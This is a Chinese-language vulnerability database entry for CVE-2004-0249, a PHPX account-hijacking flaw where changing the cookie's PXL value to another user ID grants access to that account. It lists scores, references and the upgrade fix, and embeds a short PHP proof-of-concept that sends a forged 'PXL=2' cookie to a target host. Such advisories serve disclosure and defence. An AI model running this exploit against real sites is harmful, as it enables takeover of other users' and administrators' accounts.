CVE-2004-0249
CVSS10.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:42:25
NMCOE    

[原文]PHPX 2.0 through 3.2.4 allows remote attackers to gain access to other accounts by modifying the cookie's PXL variable to reference another userID.


[CNNVD]PHPX多重漏洞(CNNVD-200411-143)

        PHPX 2.0到3.2.4版本存在漏洞。远程攻击者可以通过修改cookie的PXL变量以参考其他userID来获取其他账户的访问权限。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0249
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0249
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-143
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2004-03/0154.html
(UNKNOWN)  BUGTRAQ  20040316 PHPX 2.x - 3.2.4
http://marc.info/?l=bugtraq&m=107586932324901&w=2
(UNKNOWN)  BUGTRAQ  20040203 Multiple Vulnerabilities in PHPX
http://www.securityfocus.com/bid/9569
(VENDOR_ADVISORY)  BID  9569
http://xforce.iss.net/xforce/xfdb/15052
(VENDOR_ADVISORY)  XF  phpx-cookie-account-hijacking(15052)
http://xforce.iss.net/xforce/xfdb/15512
(UNKNOWN)  XF  phpx-session-hijack(15512)

- 漏洞信息

PHPX多重漏洞
危急 输入验证
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        PHPX 2.0到3.2.4版本存在漏洞。远程攻击者可以通过修改cookie的PXL变量以参考其他userID来获取其他账户的访问权限。

- 公告与补丁

        These issues are addressed in PHPX 3.2.4.
        PHPX PHPX 3.2.3
        

- 漏洞信息 (23644)

PHPX 3.2.3 Multiple Vulnerabilities (EDBID:23644)
php webapps
2004-02-03 Verified
0 Manuel L?pez
N/A [点击下载]
source: http://www.securityfocus.com/bid/9569/info

Multiple vulnerabilities were reported in PHPX. The specific issues include cross-site scripting, HTML injection and account hijacking via specially crafted cookies.

These issues were reported to exist in PHPX 3.2.3. Earlier versions are also likely affected.

<?php
/* Proof of concept for exploiting PHPX 3.2.4 (http://www.phpx.org) */
/* Quick hack, not really an affective tool, only useful as a demonstration */
/* Written by HelloWorld - Ryan Wray */

/* Usage: php -q exploit_file.php <host> <port> <admin_folder_location> */
function usage()
{
    echo "Usage request";
}

function bytes_left($fp)
{
    $status=socket_get_status($fp);
    if($status['unread_bytes'] > 0) { return true; }
    return false;
}
print_r($_SERVER['argv']);
if($_SERVER['argc'] != 4)
{
    exit(usage());
}

// Attempt to connect to host.
$fp=@fsockopen($_SERVER['argv'][1],$_SERVER['argv'][2]);

if(!$fp)
{
    exit('Could not connect to host: '.$_SERVER['argv'][1].':'.$_SERVER['argv'][2]);
}

else
{
    fputs($fp,"GET ".$_SERVER['argv'][3]."index.php HTTP/1.1\r\n");
    fputs($fp,"Host: ".$_SERVER['argv'][1]."\r\n");
    fputs($fp,"Cookie: PXL=2\r\n\r\n");
}
// Start accepting data, otherwise socket_get_status will say there are 0 unread bytes.
echo fgets($fp,1024);
// While we can read.
while(bytes_left($fp))
{
    echo fgets($fp,1024);
}
// Close the socket.
fclose($fp);
?>		

- 漏洞信息

15661
PHPX Cookie PXL Value Modification Account Hijacking
Remote / Network Access Authentication Management, Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

PHPX contains a flaw that may allow a malicious user to hijack other accounts. The issue is triggered when an attacker modifies the cookie's PXL value and submits it to the site. This can be used to hijack arbitrary accounts including the administrative account.

- 时间线

2004-02-03 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.2.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站